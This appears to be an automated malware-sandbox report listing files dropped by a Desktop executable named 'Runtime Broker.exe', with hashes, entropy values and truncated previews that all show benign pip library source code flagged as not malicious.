SHA-512:	7079D1BE1E648335B86A4FC8A7CC354E63302D826E84F315902C48E9957CC805FE7709391CE87DAECB443F5EE194410DF0B11ABCF82D21EAEF0F9640A61612E6
Malicious:	false
Preview:	from __future__ import absolute_import, division..import contextlib.import itertools.import logging.import sys.import time..from pip._vendor.progress import HIDE_CURSOR, SHOW_CURSOR..from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.logging import get_indentation.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import IO, Iterator..logger = logging.getLogger(__name__)...class SpinnerInterface(object):. def spin(self):. # type: () -> None. raise NotImplementedError().. def finish(self, final_status):. # type: (str) -> None. raise NotImplementedError()...class InteractiveSpinner(SpinnerInterface):. def __init__(self, message, file=None, spin_chars="-\\\|/",. # Empirically, 8 updates/second looks nice. min_update_interval_seconds=0.125):. # type: (str, IO[str], str, float) -> None. self._message = message. if file is None:.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\cli\status_codes.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	156
Entropy (8bit):	4.885051115080301
Encrypted:	false
SSDEEP:	3:166MRm6NKXRGnHRGbx4rJrL33xwGzJggFo19ZCcrMiy3S2IfUFGv:1RMABCRXrlLV0AGh
MD5:	360B5FBCFC4CA8DB6FEE55A71EA27D7F
SHA1:	9D2120560B68A6CF2B0EAB89CCFBF5B5336067A9
SHA-256:	17AB831BA1A3ED134A4095039DDF3B40AA88D7A52CFADF81D303C5FF840CA567
SHA-512:	D6B3948B99043A21603E28FC80FFA48477D20A4E54CDB23624BF1DAAF9CD1C9C1361CC632099BFE765EBCCB985D5964A20005C35EE46645ADA1CCA6A08998F6A
Malicious:	false
Preview:	from __future__ import absolute_import..SUCCESS = 0.ERROR = 1.UNKNOWN_ERROR = 2.VIRTUALENV_NOT_FOUND = 3.PREVIOUS_BUILD_DIR_ERROR = 4.NO_MATCHES_FOUND = 23.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4101
Entropy (8bit):	4.715819151501704
Encrypted:	false
SSDEEP:	96:MKjOqXzkSuM8qdZNKmyPuz0mToXMRd3QZY0kEPoFw1wenkCWOAiw9ywsg/FMjXa2:Iqjkf4dF4niWQWZ
MD5:	30CF8D21165677AD98ADAC1FEC69EE4F
SHA1:	5BD3E241852AD14508DC6D4FC4F8B6C73E992F59
SHA-256:	DF499AC75353FA3598AF300AC22A0FB94803EF910AB9BA8B901847626799407F
SHA-512:	FF9CFD958D44389A1FE61B53175F6E2DBDC2290BCF7265C5E9F45FF84B5E585B78013F43786DC964FA6D95C19875EAED5B65580B7B8109E17DBE8AEF79288B96
Malicious:	false
Preview:	""".Package containing all pip commands."""..# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False.# There is currently a bug in python/typeshed mentioned at.# https://github.com/python/typeshed/issues/3906 which causes the.# return type of difflib.get_close_matches to be reported.# as List[Sequence[str]] whereas it should have been List[str]..from __future__ import absolute_import..import importlib.from collections import OrderedDict, namedtuple..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any.. from pip._internal.cli.base_command import Command...CommandInfo = namedtuple('CommandInfo', 'module_path, class_name, summary')..# The ordering matters for help display..# Also, even though the module path starts with the same.# "pip._internal.commands" prefix in each case, we include the full path.# because it makes testing easier (specifically when modifying commands_dict.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7555
Entropy (8bit):	4.519423458453826
Encrypted:	false
SSDEEP:	96:eubzkApHs1jt5xNwBH0n11RPw+OFm1Tr18VKBCZAeQI0OaBIM6XeGoLR8am665HF:lkAm1jvH1VlRejXeDFmLHlxIW
MD5:	B34A7E696498C48D41E5FC32DAA6ED71
SHA1:	C6D66AA00246F7556A76DBBE15E4C99B66557F46
SHA-256:	9BB4FD0BA8C1EDF98DA33C86DB82752E4793B28C9FC8851883FE68B48994ABAE
SHA-512:	23A6EB415C5D8B2F0344DB2CE1954BCEDFC56F2A9F55EB875EA9EE6B9903AF56BC5EE30181E2FF4661C9ED9D3176165ACA2A8602508DFA3275ED8A73B7B19A3C
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.import os.import textwrap..import pip._internal.utils.filesystem as filesystem.from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.exceptions import CommandError, PipError.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import Any, List...logger = logging.getLogger(__name__)...class CacheCommand(Command):. """. Inspect and manage pip's wheel cache... Subcommands:.. - dir: Show the cache directory.. - info: Show information about the cache.. - list: List filenames of packages stored in the cache.. - remove: Remove one or more package from the cache.. - purge: Remove all items from the cache... ``<pattern>`` can be a glob expression or a package name.. """.. ignore_require_venv = True. usage = """. %prog dir. %prog info. %

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\check.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1677
Entropy (8bit):	4.521393481495529
Encrypted:	false
SSDEEP:	24:Xt5jdySvtRqfJ1dezOwzLT13+sXJdlcjAHQ8G0kjve5EnGfqXC:FySCxCzOU5uqoe9GRvejqS
MD5:	F3F2658E3B72C44B99584DBF2B1E180D
SHA1:	17DBDBBB0D33B99B3F52A0B4EDF10AF1FDCE0BE7
SHA-256:	3628E60082A58D6DE463E57440B313ED5B6DB840ED0EBA106B9AAB7F2E01FB52
SHA-512:	F11C0E4A12B58B80903C58C5809CE79E21E8A0AB5E5BFC0DFEDF6523CE6FAE96142B6999A11582675EE26371D4257C667D8B19F090F5BB24879B16F83842155A
Malicious:	false
Preview:	import logging..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.operations.check import (. check_package_set,. create_package_set_from_installed,.).from pip._internal.utils.misc import write_output.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..logger = logging.getLogger(__name__)..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import Any, List...class CheckCommand(Command):. """Verify installed packages have compatible dependencies.""".. usage = """. %prog [options]""".. def run(self, options, args):. # type: (Values, List[Any]) -> int.. package_set, parsing_probs = create_package_set_from_installed(). missing, conflicting = check_package_set(package_set).. for project_name in missing:. version = package_set[project_name].version. for dependency in missing[project_name]:. write_output(.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\completion.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3081
Entropy (8bit):	4.633335805112898
Encrypted:	false
SSDEEP:	48:PP+yS8zk4kuPFle2/Ptml45qX45bH65iBaWuj/GW39y2:nn9zkClr9mBXsH7BaljOWv
MD5:	7E4A01B9F341F7C6B51DDB7984D9097F
SHA1:	663B124C34418689A2EAE6A6E2FD7CB18EC7DE4A
SHA-256:	485BAB5C8A156605CC843FAB3F0C9FB630F676D68EA2C22005B1DB089E019E6A
SHA-512:	061F5FD5852655CD99719E9FF7A2465180F60DD75B15588D7B05C5B9EB71BBC2F5111467F2EB22D270DBDE4CF481B83303EC2CD7E39AD4E809C6160DD59AC267
Malicious:	false
Preview:	from __future__ import absolute_import..import sys.import textwrap..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.utils.misc import get_prog.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List..BASE_COMPLETION = """.# pip {shell} completion start{script}# pip {shell} completion end."""..COMPLETION_SCRIPTS = {. 'bash': """. _pip_completion(). {{. COMPREPLY=( $( COMP_WORDS="${{COMP_WORDS[]}}" \\. COMP_CWORD=$COMP_CWORD \\. PIP_AUTO_COMPLETE=1 $1 2>/dev/null ) ). }}. complete -o default -F _pip_completion {prog}. """,. 'zsh': """. function _pip_completion {{. local words cword. read -Ac words. read -cn cword. reply=( $( COMP_WORDS="$words[]" \\. COMP_CWORD=$(( cwor

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\configuration.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9327
Entropy (8bit):	4.373180220581842
Encrypted:	false
SSDEEP:	96:Ppuzzk2RNfvnwIDY9QHoBEEINas0ncgxlyoWuZUmukHm5XAUqZvMN9+rwDx6QDw1:gXk2rfvnwIUeosvNArZrrh
MD5:	2523762271C1BE4A5FA339D5D4284FD4
SHA1:	D6A81B5F930039F23401C9D05CE79E045FE7C33E
SHA-256:	8B8B8C6D670AF8F5B554B63B7FA78A92587BA8ED499ECBEABEA7B8718E948F86
SHA-512:	AD5CCE1A6BC4EA5E01DA6AD77583D5E41DFC3792B559A1266DB73596022CA395AB6345E166317328A7D8DC35642552A82EDF84DFE172831A7D0066252D127D0C
Malicious:	false
Preview:	import logging.import os.import subprocess..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.configuration import Configuration, get_configuration_files, kinds.from pip._internal.exceptions import PipError.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import get_prog, write_output.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import Any, List, Optional.. from pip._internal.configuration import Kind..logger = logging.getLogger(__name__)...class ConfigurationCommand(Command):. """. Manage local and global configuration... Subcommands:.. - list: List the active configuration (or from the file specified). - edit: Edit the configuration file in an editor. - get: Get the value associated with name. - set: Set the name=value. - unset: Unset the value associated with name.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\debug.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7315
Entropy (8bit):	4.665870992235139
Encrypted:	false
SSDEEP:	192:jJekiW9fQnqgs/BVW3xSY6uCK+E308TqKsQQVMWuGJV:jJ994ns2xLCK+Q9OKnxWuW
MD5:	185ADD74CA7D259726DF6AE1F56DEE2B
SHA1:	51C82961DDA848E719F766822E81B40A1C31F6A9
SHA-256:	A0F3CBFA45B57DCD969346EB10E9564493FE052D80EB24A7E6FE3D13F92C225F
SHA-512:	A3F6B8502ECD9F3B8BA2478917B32F7BCCFA336321994D5AE374239ADB920633E42097EDF7D79CA02D2404595F91058F537627DB2D39462500CE7803BACE7893
Malicious:	false
Preview:	from __future__ import absolute_import..import locale.import logging.import os.import sys..import pip._vendor.from pip._vendor import pkg_resources.from pip._vendor.certifi import where..from pip import __file__ as pip_location.from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import get_pip_version.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from types import ModuleType. from typing import Dict, List, Optional.. from pip._internal.configuration import Configuration..logger = logging.getLogger(__name__)...def show_value(name, value):. # type: (str, Optional[str]) -> None. logger.info('%s: %s', name, value)...def show_sys_implementation():. # type: () -> None. logger

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\download.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4919
Entropy (8bit):	4.5372256466682535
Encrypted:	false
SSDEEP:	48:P8gIqySOQv3zkDxEbkHY3x10kfjuGN45J5v5J535/950n5Hn5rn5dh58575teXF5:LIjszkDxTHyeGGgVVf363NnSgd/QgFMx
MD5:	DEB959A037918D72793874C6A6F5A6FF
SHA1:	4B6CB13D67D75D6B82BF763FEB67DF3C4D3888F3
SHA-256:	34693FB041AE8BE21DFB58E48B61736DC4C0E0764A1156E722610D9C71B0F22B
SHA-512:	D99EAEB7FF527BF0ECF9EE144863A29DCBD156E344A5F217217C2AFF3F67A3B9200F9B7FC319DE7A938900C55EAB36AEB660C22CA8EB47FC754B81BDAF0A5A16
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.import os..from pip._internal.cli import cmdoptions.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.req_command import RequirementCommand, with_cleanup.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.req.req_tracker import get_requirement_tracker.from pip._internal.utils.misc import ensure_dir, normalize_path, write_output.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List..logger = logging.getLogger(__name__)...class DownloadCommand(RequirementCommand):. """. Download packages from:.. - PyPI (and other indexes) using requirement specifiers.. - VCS project urls.. - Local project directories.. - Local or remote source archives... pip also supports downloading from "requirements files", which provide. an easy w

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\freeze.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3871
Entropy (8bit):	4.444521983233659
Encrypted:	false
SSDEEP:	48:PP0WySjWzFaELrTB45jJcQ5gxND5oMZF7c5cC5EQ55uU6555EvWks2IwPqWATRFt:nW1zbLfqJcV7NF7YuUR9dqWmqVANX
MD5:	80931931B91AF3340E46536D8FCD50F9
SHA1:	EEEE11D0BB315C5BD1E864B61479D2ADEA0FDE95
SHA-256:	F197360201A9BD0D67F2137568216097A0BD7C7ED4405F9C5A22ECCED91D8BD5
SHA-512:	6A0E1B201FBFFCB24438A588A037E6304194095152D36DFB4E5283776B81544B95BE8BA9B250689750EF85A67B8A32AE717F07FAACD95BC69A4E8BD8CC3A50B9
Malicious:	false
Preview:	from __future__ import absolute_import..import sys..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.models.format_control import FormatControl.from pip._internal.operations.freeze import freeze.from pip._internal.utils.compat import stdlib_pkgs.from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..DEV_PKGS = {'pip', 'setuptools', 'distribute', 'wheel'}..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List...class FreezeCommand(Command):. """. Output installed packages in requirements format... packages are listed in a case-insensitive sorted order.. """.. usage = """. %prog [options]""". log_streams = ("ext://sys.stderr", "ext://sys.stderr").. def add_options(self):. # type: () -> None. self.cmd_opts.add

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\hash.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1843
Entropy (8bit):	4.743488528267918
Encrypted:	false
SSDEEP:	48:PZUySVtzkQJKqsj45pHWk/htB4UTqlY3k:xpatzkQYK9JPrkY3k
MD5:	48D0433873DE6FA264E2E1D2ADE74394
SHA1:	3EF410EA921A74297F61AE5E5DAA4E1DC92AB875
SHA-256:	BF69D80A212C108F6711A9B5A7A1B0746F31CA3E6016FFB85ABAAF35EC4A99E6
SHA-512:	5C9494CEC16DB65E970B72BD3B3259DCCB135D8D8914CFE541FE1504BDB8CFA7D06BD628501E32ABFF0AAAA2C440A29344C88A5D77AB8DE2753F0BCA873ACA77
Malicious:	false
Preview:	from __future__ import absolute_import..import hashlib.import logging.import sys..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.utils.hashes import FAVORITE_HASH, STRONG_HASHES.from pip._internal.utils.misc import read_chunks, write_output.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List..logger = logging.getLogger(__name__)...class HashCommand(Command):. """. Compute a hash of a local package archive... These can be used with --hash in a requirements file to do repeatable. installs.. """.. usage = '%prog [options] <file> ...'. ignore_require_venv = True.. def add_options(self):. # type: () -> None. self.cmd_opts.add_option(. '-a', '--algorithm',. dest='algorithm',. choices=STRONG_HASHES,. action='store',. default=FAVORITE

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\help.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1294
Entropy (8bit):	4.560573463710737
Encrypted:	false
SSDEEP:	24:1R2Nt5jdySvXD6ezkwzIISHpOL5sD2f2FtLGmde8LLbKxAp2M3y:P0ySvzktxHpOFk2028LvKq3y
MD5:	F17EB7D35B140632B5C33601EB19B25B
SHA1:	14091B8DC0F89F8C5EC75FBD7C15E04F8BD02372
SHA-256:	A1F9387B3D40691D7A9216BEC380CBB963A2FC1F36C3153FD9A4F65671CCF1C8
SHA-512:	17093B88F02BE7B27AF1457FF7FC0614F7E3E195A8AEC3AFDC5B10D98AA21138D727BAC14D91EC9F107FEA8720F410B2C880068D61A0A4E6BF50E8D76A7BD6F4
Malicious:	false
Preview:	from __future__ import absolute_import..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List...class HelpCommand(Command):. """Show help for commands""".. usage = """. %prog <command>""". ignore_require_venv = True.. def run(self, options, args):. # type: (Values, List[str]) -> int. from pip._internal.commands import (. commands_dict,. create_command,. get_similar_commands,. ).. try:. # 'pip help' with no args is handled by pip.__init__.parseopt(). cmd_name = args[0] # the command we need help for. except IndexError:. return SUCCESS.. if cmd_name not in commands_dict:. guess = get_similar_commands(cmd_name)..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\install.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	27381
Entropy (8bit):	4.283199915904175
Encrypted:	false
SSDEEP:	384:8WZLRNGkOkX4zMPFg8o7vgqX87vPZBKjsvm68c:8WZLRNGkLzoUijaQc
MD5:	E2B91535043E3574E8E88DB06AD9CAAA
SHA1:	84E6AABC5E45D8727EF147EEFC6A30D8B778D883
SHA-256:	3DD826E59AC7AE512CF5342DC29EA9FEC7A5BE523AC01829F09844F0C9D16DFB
SHA-512:	9DD1227E71BFDB08D95B1E64CA10B08DE3B4287ECB586AFD707CB8E3DC1A36C446409B84EDF86699700B7C69094303DD8F3A1BADEA3DC125B0E7DCBA03B09961
Malicious:	false
Preview:	from __future__ import absolute_import..import errno.import logging.import operator.import os.import shutil.import site.from optparse import SUPPRESS_HELP..from pip._vendor import pkg_resources.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.req_command import RequirementCommand, with_cleanup.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.exceptions import CommandError, InstallationError.from pip._internal.locations import distutils_scheme.from pip._internal.operations.check import check_install_conflicts.from pip._internal.req import install_given_reqs.from pip._internal.req.req_tracker import get_requirement_tracker.from pip._internal.utils.distutils_args import parse_distutils_args.from pip._internal.utils.filesystem import test_writable_dir.from pip._internal.utils.misc import

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\list.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	11519
Entropy (8bit):	4.36660177780474
Encrypted:	false
SSDEEP:	96:PJ/aSKzkzWS7frjfUKAOV4X1KlxnqWXVAC2v2xkcScjhVXZiQXV39VBMoKLU4ufW:B/0kzbxq1Kl5qWevv2x/buGpaIU
MD5:	6452D65B23DB467ABD286F0B8B1C40F5
SHA1:	14279A382DF3A221BB20CAB2DCAEF65362CC7A00
SHA-256:	C0F7BD1CFD77DBA2BDD4C6E1FCF56CDC109DC2E1DBBE4063BADE4999E197DC15
SHA-512:	045AAC0C4CF56668136DFAB3456F043F1DBC78D3DF128810DB916DC5E805E57405471E55E13A0A72DCAC7CB62103087C6357B9BDCD359C3D1D7891670817CF34
Malicious:	false
Preview:	from __future__ import absolute_import..import json.import logging..from pip._vendor import six..from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import IndexGroupCommand.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.utils.compat import stdlib_pkgs.from pip._internal.utils.misc import (. dist_is_editable,. get_installed_distributions,. tabulate,. write_output,.).from pip._internal.utils.packaging import get_installer.from pip._internal.utils.parallel import map_multithread.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import Iterator, List, Set, Tuple.. from pip._vendor.pkg_resources import Distribution..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\search.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5758
Entropy (8bit):	4.596537889735221
Encrypted:	false
SSDEEP:	96:F423siRExzkhIBrej9lH3eGdJUxCk8SHIq+REfpFLLVNQ8iVFkCorLlKoq:FtdERkhxfHddW8pSHIqiEz3rQ8eF6q
MD5:	73928D7205253500248C4F52F8BC3A12
SHA1:	7BF393932AF026F301347A29DC0D37B898AC5A4D
SHA-256:	25279D7066707F8AE8ADDA4DB4BABE4194BA55777024BBADBDF1CE375291C28D
SHA-512:	2A15D2809B1E83E19C76AA981A9BA86985EB6FA00F14529F07B467A628A0308D2EF67FB9A5E2DD0F664FB2F180286853103D2C891E5FEF843E68B1D8C67B2CBC
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.import sys.import textwrap.from collections import OrderedDict..from pip._vendor import pkg_resources.from pip._vendor.packaging.version import parse as parse_version..# NOTE: XMLRPC Client is not annotated in typeshed as on 2017-07-17, which is.# why we ignore the type on this import.from pip._vendor.six.moves import xmlrpc_client # type: ignore..from pip._internal.cli.base_command import Command.from pip._internal.cli.req_command import SessionCommandMixin.from pip._internal.cli.status_codes import NO_MATCHES_FOUND, SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.models.index import PyPI.from pip._internal.network.xmlrpc import PipXmlrpcTransport.from pip._internal.utils.compat import get_terminal_size.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import get_distribution, write_output.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUN

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\show.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6996
Entropy (8bit):	4.558277104331101
Encrypted:	false
SSDEEP:	96:HFzkZ+5X9s4QUXM9t8fASZv8ac6JC2UhqNTpB1Ipt3wKpQsI6Ag7Zlojile5SsHv:9kZ264QnBhGTpB+3TlupP
MD5:	8DA800A4FF5B164FCDDD576873B6FA99
SHA1:	F1599FA86CC801B2BD68C60034035DFCF27307B3
SHA-256:	CE4F4566A34F6794387465E72AB29D9373DA2CFB163873B0A055866CCCE1A0A0
SHA-512:	C005783599437E527A9867CED7B5AF05800B6899BCE059C6BEA84D032E4752D0201635E4A5EDBB6E3680C62DFD92CC552033EB921DAE3610948054E0DBCA2956
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.import os.from email.parser import FeedParser..from pip._vendor import pkg_resources.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.utils.misc import write_output.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import Dict, Iterator, List..logger = logging.getLogger(__name__)...class ShowCommand(Command):. """. Show information about one or more installed packages... The output is in RFC-compliant mail header format.. """.. usage = """. %prog [options] <package> ...""". ignore_require_venv = True.. def add_options(self):. # type: () -> None. self.cmd_opts.add_option(. '-f', '--files',. dest='files',. action='store_true',. default=F

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\uninstall.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3311
Entropy (8bit):	4.383466210366024
Encrypted:	false
SSDEEP:	48:PBWSySF0gOozzk8lw+4H7mS2pgRKIz45jmA5XJAi6qDWkRRCOLotCGIY:ajozzkMw3iS2RmYJAit9fjotBIY
MD5:	B5F0093216166C1438D2E43498347FB3
SHA1:	7AB5EDE170ECDD292C17DBCCF073407015BA091C
SHA-256:	62CF21C05B20D24BEF1AD2C6606DE26CBE412AF5118654A5097E74650FA1B079
SHA-512:	2AA89797DCA81FB1E32FD7464189DFE7FA084F9867B5FBBB7096E479DDFF773FF6E870C51FBDF825409091E81875DE4F0EE94B64577C98406A06B8E0845FCC33
Malicious:	false
Preview:	from __future__ import absolute_import..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli.base_command import Command.from pip._internal.cli.req_command import SessionCommandMixin.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import InstallationError.from pip._internal.req import parse_requirements.from pip._internal.req.constructors import (. install_req_from_line,. install_req_from_parsed_requirement,.).from pip._internal.utils.misc import protect_pip_from_modification_on_windows.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List...class UninstallCommand(Command, SessionCommandMixin):. """. Uninstall packages... pip is able to uninstall most installed packages. Known exceptions are:.. - Pure distutils packages installed with ``python setup.py install``, which. leave behind no metadata to determine what fil

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\commands\wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6538
Entropy (8bit):	4.484724502459671
Encrypted:	false
SSDEEP:	96:SIjUzG84x4ysF3SsULV4Rk8fVVnAN5tOMuanS0qaztWQ7u7s2:qNW4ysMs++Rk8+vEVr
MD5:	475ACAFD28EB8F1EBAAB629E165F9D53
SHA1:	4DF8F344609E287E80E8677290FC30E3367982D9
SHA-256:	1BC6DA3AC3AACA81B5B4835B26573F94343C73BE20370AF7C2D1637CABBA9115
SHA-512:	459B4B8D2CF6AF74BA547B25FBDFC4970FD0350833F69E39105485D858B5C77826E422C13639242836BDA23FF43BB1C5812F15C7A53966FC220E74B028DB607F
Malicious:	false
Preview:	# -- coding: utf-8 --..from __future__ import absolute_import..import logging.import os.import shutil..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import RequirementCommand, with_cleanup.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.req.req_tracker import get_requirement_tracker.from pip._internal.utils.misc import ensure_dir, normalize_path.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.wheel_builder import build, should_build_for_wheel_command..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import List.. from pip._internal.req.req_install import InstallRequirement..logger = logging.getLogger(__name__)...class WheelCommand(RequirementCommand):. """. Build Wheel archives for your requirements and dependencies... Wheel

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\configuration.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	13904
Entropy (8bit):	4.557081778081241
Encrypted:	false
SSDEEP:	192:+qmk64huxXYmXi40G3Qo9XOg0GBaY3g8/oq7k1idm707OkNq19JJEa:+34hsnXd0G3QWfDBa6Vk1idmQCk49J7
MD5:	987122B453349B847842DA29DE7A364A
SHA1:	B2F2EC9C98986B4876F24771C00D0943A48A512F
SHA-256:	079EEAB3B1F47068FC38F1D0F1F79E03317CAB7DF759B76077ADE9A750AD49C3
SHA-512:	1BBC608148D5C695A97C31FD4E1A1DCB3FA9A7CBE9FC3D67E5609D256D4E56E0D43A5FC68C2DA967A6032BC88BE008ADA7710862AF36B6FE5DF899C34A9864AA
Malicious:	false
Preview:	"""Configuration management setup..Some terminology:.- name. As written in config files..- value. Value associated with a name.- key. Name combined with it's section (section.name).- variant. A single word describing where the configuration key-value pair came from."""..import locale.import logging.import os.import sys..from pip._vendor.six.moves import configparser..from pip._internal.exceptions import (. ConfigurationError,. ConfigurationFileCouldNotBeLoaded,.).from pip._internal.utils import appdirs.from pip._internal.utils.compat import WINDOWS, expanduser.from pip._internal.utils.misc import ensure_dir, enum.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, Iterable, List, NewType, Optional, Tuple.. RawConfigParser = configparser.RawConfigParser # Shorthand. Kind = NewType("Kind", str)..CONFIG_BASENAME = 'pip.ini' if WINDOWS else 'pip.conf'.ENV_NAMES_IGNORED = "version", "help"..# The kinds of confi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\distributions\__init__.py Download File
